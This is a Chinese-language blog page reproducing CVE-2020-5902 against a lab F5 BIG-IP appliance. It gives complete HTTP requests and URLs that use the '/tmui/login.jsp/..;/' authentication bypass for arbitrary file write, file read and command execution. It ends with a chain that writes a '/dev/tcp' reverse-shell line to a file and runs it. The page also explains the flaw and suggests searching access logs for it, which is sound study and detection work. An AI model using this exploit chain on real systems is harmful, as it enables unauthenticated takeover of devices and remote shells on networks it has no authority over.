<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现 | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="影响版本 BIG-IP 15.x: 15.1.0&#x2F;15.0.0BIG-IP 14.x: 14.1.0 ~ 14.1.2BIG-IP 13.x: 13.1.0 ~ 13.1.3BIG-IP 12.x: 12.1.0 ~ 12.1.5BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建12下载https:&#x2F;&#x2F;downloads.f5.com&#x2F;esd&#x2F;ecc.sv?sw&#x3D;BIG-IP&amp;am">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/07/28/pqp9in/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="影响版本 BIG-IP 15.x: 15.1.0&#x2F;15.0.0BIG-IP 14.x: 14.1.0 ~ 14.1.2BIG-IP 13.x: 13.1.0 ~ 13.1.3BIG-IP 12.x: 12.1.0 ~ 12.1.5BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建12下载https:&#x2F;&#x2F;downloads.f5.com&#x2F;esd&#x2F;ecc.sv?sw&#x3D;BIG-IP&amp;am">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595407668199-dae3aca8-3f11-47d4-b84e-0d0e95c37c7b.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=511&originWidth=1900&size=108261&status=done&style=none&width=950">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408339314-286fa910-502c-41ac-bc36-b6ba104cc204.png#align=left&display=inline&height=268&margin=%5Bobject%20Object%5D&name=image.png&originHeight=535&originWidth=1920&size=98768&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409948182-1b91b169-68e5-451a-9073-52f9b6f1ca7c.png#align=left&display=inline&height=204&margin=%5Bobject%20Object%5D&name=image.png&originHeight=408&originWidth=1920&size=81576&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409975823-593a24dc-3ed7-468e-ae1f-60132ad2bf57.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=690&size=7521&status=done&style=none&width=345">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408641311-48960032-fdf0-4ea6-9c41-2c598b940550.png#align=left&display=inline&height=142&margin=%5Bobject%20Object%5D&name=image.png&originHeight=283&originWidth=1920&size=52760&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409260719-7eef6bb4-f07e-4542-a87a-dfd9e31d075e.png#align=left&display=inline&height=540&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1080&originWidth=1920&size=253056&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410314472-59e741f5-e724-4142-99c9-ef9c0ca6a9d4.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1920&size=82603&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410336735-c2d8bc3e-c5ab-4678-a99f-64f150ed58bb.png#align=left&display=inline&height=75&margin=%5Bobject%20Object%5D&name=image.png&originHeight=150&originWidth=698&size=8772&status=done&style=none&width=349">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410856388-e7c4b0be-2157-4775-8d80-24f1d5530140.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=679&originWidth=1920&size=97449&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595413482404-4d48bf5f-3096-44f7-8405-5c55ba556b59.png#align=left&display=inline&height=313&margin=%5Bobject%20Object%5D&name=image.png&originHeight=625&originWidth=1920&size=112298&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595411481244-c61dfbc1-0c4c-46ba-a355-8d3a4cd369fe.png#align=left&display=inline&height=339&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1920&size=106105&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495114473-0d881d34-783d-4de5-8bc9-bb70e2dad505.png#align=left&display=inline&height=70&margin=%5Bobject%20Object%5D&name=image.png&originHeight=70&originWidth=565&size=5366&status=done&style=none&width=565">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495185115-2b87089b-3667-4e74-b934-13b1f7954479.png#align=left&display=inline&height=241&margin=%5Bobject%20Object%5D&name=image.png&originHeight=482&originWidth=1508&size=119550&status=done&style=none&width=754">
<meta property="article:published_time" content="2020-07-28T06:03:08.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:21.034Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>

    <main id="main">
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-07-28T06:03:08.000Z" itemprop="datePublished" class="page-time">
  2020-07-28
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    


<article id="post-pqp9in"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-07-28 14:03:08" datetime="2020-07-28T06:03:08.000Z"  itemprop="datePublished">2020-07-28</time>

            


            


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <p><strong>影响版本</strong></p>
<p>BIG-IP 15.x: 15.1.0/15.0.0<br>BIG-IP 14.x: 14.1.0 ~ 14.1.2<br>BIG-IP 13.x: 13.1.0 ~ 13.1.3<br>BIG-IP 12.x: 12.1.0 ~ 12.1.5<br>BIG-IP 11.x: 11.6.1 ~ 11.6.5</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">下载</span><br><span class="line">https://downloads.f5.com/esd/ecc.sv?sw=BIG<span class="literal">-IP</span>&amp;pro=big<span class="literal">-ip_v15</span>.x&amp;ver=<span class="number">15.1</span>.<span class="number">0</span>&amp;container=Virtual<span class="literal">-Edition</span></span><br></pre></td></tr></table></figure>

<p>访问：<a href="https://192.168.56.93/tmui/login.jsp" target="_blank" rel="noopener">https://192.168.56.93/</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>nmap 脚本：<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1595916189004-b430281c-9b29-44f9-9a49-1336b0073eca.zip?_lake_card=%7B%22uid%22%3A%221595407173963-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1595916189004-b430281c-9b29-44f9-9a49-1336b0073eca.zip%22%2C%22name%22%3A%22http-vuln-cve2020-5902.zip%22%2C%22size%22%3A1793%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22k0CXk%22%2C%22card%22%3A%22file%22%7D">http-vuln-cve2020-5902.zip</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595407668199-dae3aca8-3f11-47d4-b84e-0d0e95c37c7b.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=511&originWidth=1900&size=108261&status=done&style=none&width=950" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="任意文件上传"><a href="#任意文件上传" class="headerlink" title="任意文件上传"></a>任意文件上传</h3><h4 id="文件上传一："><a href="#文件上传一：" class="headerlink" title="文件上传一："></a>文件上传一：</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: max-age&#x3D;0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Referer: https:&#x2F;&#x2F;192.168.56.93&#x2F;tmui&#x2F;login.jsp</span><br><span 
class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br><span class="line">Content-Length: 49</span><br><span class="line"></span><br><span class="line">fileName&#x3D;&#x2F;tmp&#x2F;success&amp;content&#x3D;CVE-2020-5902</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408339314-286fa910-502c-41ac-bc36-b6ba104cc204.png#align=left&display=inline&height=268&margin=%5Bobject%20Object%5D&name=image.png&originHeight=535&originWidth=1920&size=98768&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h4 id="文件上传二："><a href="#文件上传二：" class="headerlink" title="文件上传二："></a>文件上传二：</h4><p><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test1&amp;content=id</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409948182-1b91b169-68e5-451a-9073-52f9b6f1ca7c.png#align=left&display=inline&height=204&margin=%5Bobject%20Object%5D&name=image.png&originHeight=408&originWidth=1920&size=81576&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409975823-593a24dc-3ed7-468e-ae1f-60132ad2bf57.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=690&size=7521&status=done&style=none&width=345" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="任意文件读取："><a href="#任意文件读取：" class="headerlink" title="任意文件读取："></a>任意文件读取：</h3><p><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408641311-48960032-fdf0-4ea6-9c41-2c598b940550.png#align=left&display=inline&height=142&margin=%5Bobject%20Object%5D&name=image.png&originHeight=283&originWidth=1920&size=52760&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="任意命令执行"><a href="#任意命令执行" class="headerlink" title="任意命令执行"></a>任意命令执行</h3><h4 id="修改-alias-劫持-list-命令为-bash"><a href="#修改-alias-劫持-list-命令为-bash" class="headerlink" title="修改 alias 劫持 list 命令为 bash"></a>修改 alias 劫持 list 命令为 bash</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;create+cli+alias+private+list+command+bash HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409260719-7eef6bb4-f07e-4542-a87a-dfd9e31d075e.png#align=left&display=inline&height=540&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1080&originWidth=1920&size=253056&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="写入-bash-文件"><a href="#写入-bash-文件" class="headerlink" title="写入 bash 文件"></a>写入 bash 文件</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp?fileName&#x3D;&#x2F;tmp&#x2F;test3&amp;content&#x3D;ifconfig HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410314472-59e741f5-e724-4142-99c9-ef9c0ca6a9d4.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1920&size=82603&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410336735-c2d8bc3e-c5ab-4678-a99f-64f150ed58bb.png#align=left&display=inline&height=75&margin=%5Bobject%20Object%5D&name=image.png&originHeight=150&originWidth=698&size=8772&status=done&style=none&width=349" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

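<h4 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h4><p>1、执行 bash 文件（未登录）<br><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test</code></p>
<p>说明：未登录也能访问这些 JSP，是因为路径中的 <code>/tmui/login.jsp/..;/</code> 让前端的登录校验与后端对 URL 的解析不一致，请求因此绕过了认证。排查时可在 Web 访问日志中检索 URI 含 <code>..;</code> 的 <code>/tmui/</code> 请求。</p>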
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410856388-e7c4b0be-2157-4775-8d80-24f1d5530140.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=679&originWidth=1920&size=97449&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、执行 bash 文件（已登录）</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595413482404-4d48bf5f-3096-44f7-8405-5c55ba556b59.png#align=left&display=inline&height=313&margin=%5Bobject%20Object%5D&name=image.png&originHeight=625&originWidth=1920&size=112298&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>注意：是否登录成功可以从 Cookie 判断：登录成功后 Cookie 中会多出 BIGIPAuthCookie 等字段。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#登录未成功</span><br><span class="line">Cookie: JSESSIONID&#x3D;C0A2E25AA53FBAB8A64B71F3045DCC63</span><br><span class="line">#登录成功</span><br><span class="line">Cookie: JSESSIONID&#x3D;C0A2E25AA53FBAB8A64B71F3045DCC63; BIGIPAuthCookie&#x3D;9856A49B5237A13A081CA03BB37CCFF3039DB71B; BIGIPAuthUsernameCookie&#x3D;admin; F5_CURRENT_PARTITION&#x3D;Common; f5formpage&#x3D;&quot;&#x2F;tmui&#x2F;overview&#x2F;welcome&#x2F;introduction.jsp?&amp;setup&#x3D;true&quot;</span><br></pre></td></tr></table></figure>

<h3 id="还原-list-命令"><a href="#还原-list-命令" class="headerlink" title="还原 list 命令"></a>还原 list 命令</h3><p><code>curl -k &quot;https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list&quot;</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595411481244-c61dfbc1-0c4c-46ba-a355-8d3a4cd369fe.png#align=left&display=inline&height=339&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1920&size=106105&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="反弹-shell"><a href="#反弹-shell" class="headerlink" title="反弹 shell"></a>反弹 shell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#劫持list命令</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;create+cli+alias+private+list+command+bash</span><br><span class="line">#bash文件写入（bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.56.212&#x2F;1234 0&gt;&amp;1）url编码</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp?fileName&#x3D;&#x2F;tmp&#x2F;test6&amp;content&#x3D;bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.56.212%2F1234+0%3E%261</span><br><span class="line">#反弹shell</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;list+&#x2F;tmp&#x2F;test6</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495114473-0d881d34-783d-4de5-8bc9-bb70e2dad505.png#align=left&display=inline&height=70&margin=%5Bobject%20Object%5D&name=image.png&originHeight=70&originWidth=565&size=5366&status=done&style=none&width=565" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495185115-2b87089b-3667-4e74-b934-13b1f7954479.png#align=left&display=inline&height=241&margin=%5Bobject%20Object%5D&name=image.png&originHeight=482&originWidth=1508&size=119550&status=done&style=none&width=754" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:21.034Z" itemprop="dateUpdated">2020-08-14 23:17:21</time>
</span><br>


        
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        



    </div>

    



    




















</article>




</div>

        <footer class="footer">
    <div class="top">
        


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>无名之辈 &copy; 2015 - 2020</span>
        </p>
    </div>
</footer>

    </main>









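    <!-- Third-party scripts run with full access to this page. Both external
         tags in this group are fetched from public CDNs without an integrity
         attribute, and the theme bundle follows the floating @latest tag, so
         the code that executes here can change without any change to this
         file. Pin an exact version and add integrity + crossorigin once the
         hash of the reviewed file is known. URLs are forced to https so the
         scripts are never fetched in clear text when the page is opened over
         http or from disk. -->
    <script src="https://cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
// Global theme settings; presumably read by the theme bundle loaded below.
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="https://unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>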



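<!-- Same supply-chain caveat as any external script: the search bundle is
     requested at the floating @latest tag and the counter script comes from a
     third-party host, both without an integrity attribute. Pin the version,
     add integrity + crossorigin for the pinned file, and consider self-hosting
     or dropping the visitor counter. https is set explicitly so neither script
     is fetched over plain http. -->
<script src="https://unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>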



<script>
(function() {
    // Capture the real page title once, at load time, so it can be put back later.
    var savedTitle = document.title;
    var restoreTimer;

    // Puts the captured title back on the tab.
    function restoreTitle() {
        document.title = savedTitle;
    }

    // Swaps the tab title whenever the page is hidden or shown again.
    function onVisibilityChange() {
        if (!document.hidden) {
            // Visible again: show the greeting, then restore the real title after 2 s.
            document.title = '(つェ⊂)咦!又好了!';
            restoreTimer = setTimeout(restoreTitle, 2000);
            return;
        }
        // Hidden: show the away title and cancel any restore that is still pending.
        document.title = '死鬼去哪里了！';
        clearTimeout(restoreTimer);
    }

    document.addEventListener('visibilitychange', onVisibilityChange);
})();
</script>



	<script type="text/javascript" src="hexo_resize_image.js"></script>
</body>
</html>
